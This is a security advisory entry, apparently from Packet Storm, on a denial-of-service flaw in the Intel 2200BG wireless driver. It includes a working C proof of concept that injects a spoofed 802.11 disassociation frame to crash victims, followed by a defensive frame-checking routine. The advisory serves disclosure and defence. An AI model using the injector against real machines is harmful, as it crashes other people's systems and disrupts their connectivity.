
intel-dos.txt

27 Jan 2007 | Reported by Breno Silva | Type: packetstorm | Source: packetstormsecurity.com

Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption. The Intel wireless mini-PCI driver (v9.0.3.9) is vulnerable to remote memory corruption via malformed disassociation packets, causing denial of service (BSOD). Driver files affected: w29n51.sys, w29mlres.dll, w29NCPA.dll

Code
`Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption  
  
Description: The Intel wireless mini-PCI driver provided with Intel  
2200BG cards is vulnerable to a remote memory corruption flaw.  
Malformed disassociation packets can be used to corrupt internal kernel  
structures, causing a denial of service (BSOD).  
  
This vulnerability was found in Intel 2200 driver version 9.0.3.9  
(09/12/2005).  
  
Driver files:  
  
w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725  
w29mlres.dll 35afeccc4092b69f62d757c4707c74e9  
w29NCPA.dll 980f58b157baedc23026dd9302406bdd  
  
Author: Breno Silva Pinto (Sekure.org) / bsilva[at]sekure[dot]org  
  
  
Proof Of Concept:  
  
#include <unistd.h>  
#include <sys/types.h>  
#include <sys/socket.h>  
#include <sys/ioctl.h>  
#include <asm/types.h>  
#include <linux/if.h>  
#include <linux/if_packet.h>  
#include <linux/if_ether.h>  
#include <linux/if_arp.h>  
#include <netinet/in.h>  
#include <stdlib.h>  
#include <string.h>  
#include <stdio.h>  
  
// 28 bytes disassociation packet.  
  
char d[] = { 0xa0, 0x00, // 0xa0 Disassociate packet, 0xa000 FC Normal  
0x00, 0x00, // Duration ID  
0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr  
0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr  
0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id  
0x00, 0x00, // Frag. Number  
0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code  
  
int main() {  
struct sockaddr_ll link;  
struct ifreq iface;  
int s;  
char packet[sizeof(d)];  
int len = 0;  
  
if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)  
return 0;  
  
bzero(&iface,sizeof(iface));  
bzero(&link,sizeof(link));  
bzero(packet,sizeof(d));  
  
strcpy(iface.ifr_name,"ath0raw");  
  
if(ioctl(s,SIOCGIFHWADDR, &iface)) {  
return 0;  
}  
  
if(ioctl(s,SIOCGIFINDEX, &iface)) {  
return -1;  
}  
  
if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {  
return -1;  
}  
  
link.sll_family = AF_PACKET;  
link.sll_ifindex = iface.ifr_ifindex;  
  
if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {  
return -1;  
}  
  
memcpy(packet,d,sizeof(d));  
len = sendto(s,packet,sizeof(d), 0, NULL, 0);  
usleep(5000);  
printf("%d bytes enviados\n",len);  
  
close(s);  
  
return 0;  
}  
  
`
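A defensive triage check for captured disassociation frames, added here as an example (it is not part of the original advisory or of Intel's driver): it parses the 24-byte management header and reports structural anomalies as a bitmask. The advisory does not say which field triggers the driver fault, so these are generic 802.11 sanity checks, and trailing bytes after the reason code are flagged only as a heuristic because later 802.11 amendments allow optional elements there. `check_disassoc`, the `A_*` flag names and `ok_frame` are assumptions of this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MGMT_HDR_LEN 24 /* frame control, duration, 3 addresses, sequence control */
enum {
    A_NOT_DISASSOC  = 1,  /* first byte is not 0xa0 (version 0, mgmt, disassoc) */
    A_TRUNCATED     = 2,  /* no room for header plus 2-byte reason code */
    A_TRAILING      = 4,  /* bytes follow the reason code (heuristic only) */
    A_RESERVED_CODE = 8,  /* reason code 0 is reserved */
    A_ADDR_MISMATCH = 16  /* neither addr1 nor addr2 equals the BSSID in addr3 */
};

/* buf starts at the 802.11 header; radiotap header and FCS already stripped.
 * Returns a bitmask of anomalies, 0 for a plain well-formed frame. */
unsigned check_disassoc(const uint8_t *buf, size_t len, uint16_t *reason)
{
    unsigned flags = 0;
    if (len < 1 || buf[0] != 0xa0)
        return A_NOT_DISASSOC;
    if (len < MGMT_HDR_LEN + 2)
        return A_TRUNCATED;
    /* Reason code is little-endian, directly after the header. */
    uint16_t code = (uint16_t)(buf[MGMT_HDR_LEN] | (buf[MGMT_HDR_LEN + 1] << 8));
    if (reason) *reason = code;
    if (len > MGMT_HDR_LEN + 2) flags |= A_TRAILING;
    if (code == 0) flags |= A_RESERVED_CODE;
    /* In an infrastructure BSS either the sender or the receiver is the AP. */
    if (memcmp(buf + 4, buf + 16, 6) != 0 && memcmp(buf + 10, buf + 16, 6) != 0)
        flags |= A_ADDR_MISMATCH;
    return flags;
}

/* The 28 bytes of the array d[] in the proof of concept above. */
static const uint8_t poc_frame[] = {
    0xa0, 0x00, 0x00, 0x00, 0x00, 0x12, 0xf0, 0x29, 0x77, 0x00,
    0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0,
    0x00, 0x00, 0x01, 0x00, 0x00, 0x00 };
/* Constructed sample: AP 02:00:00:00:00:02 disassociates a station, reason 8. */
static const uint8_t ok_frame[] = {
    0xa0, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x01,
    0x02, 0x00, 0x00, 0x00, 0x00, 0x02, 0x02, 0x00, 0x00, 0x00, 0x00, 0x02,
    0x10, 0x00, 0x08, 0x00 };

int main(void)
{
    printf("poc=0x%02x ok=0x%02x\n", check_disassoc(poc_frame, sizeof poc_frame, NULL),
           check_disassoc(ok_frame, sizeof ok_frame, NULL));
    return 0;
}
```

A non-zero result is a reason to log and inspect the frame, not proof of an attack; feed the function frames from a monitor-mode capture after removing the radiotap header and FCS.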
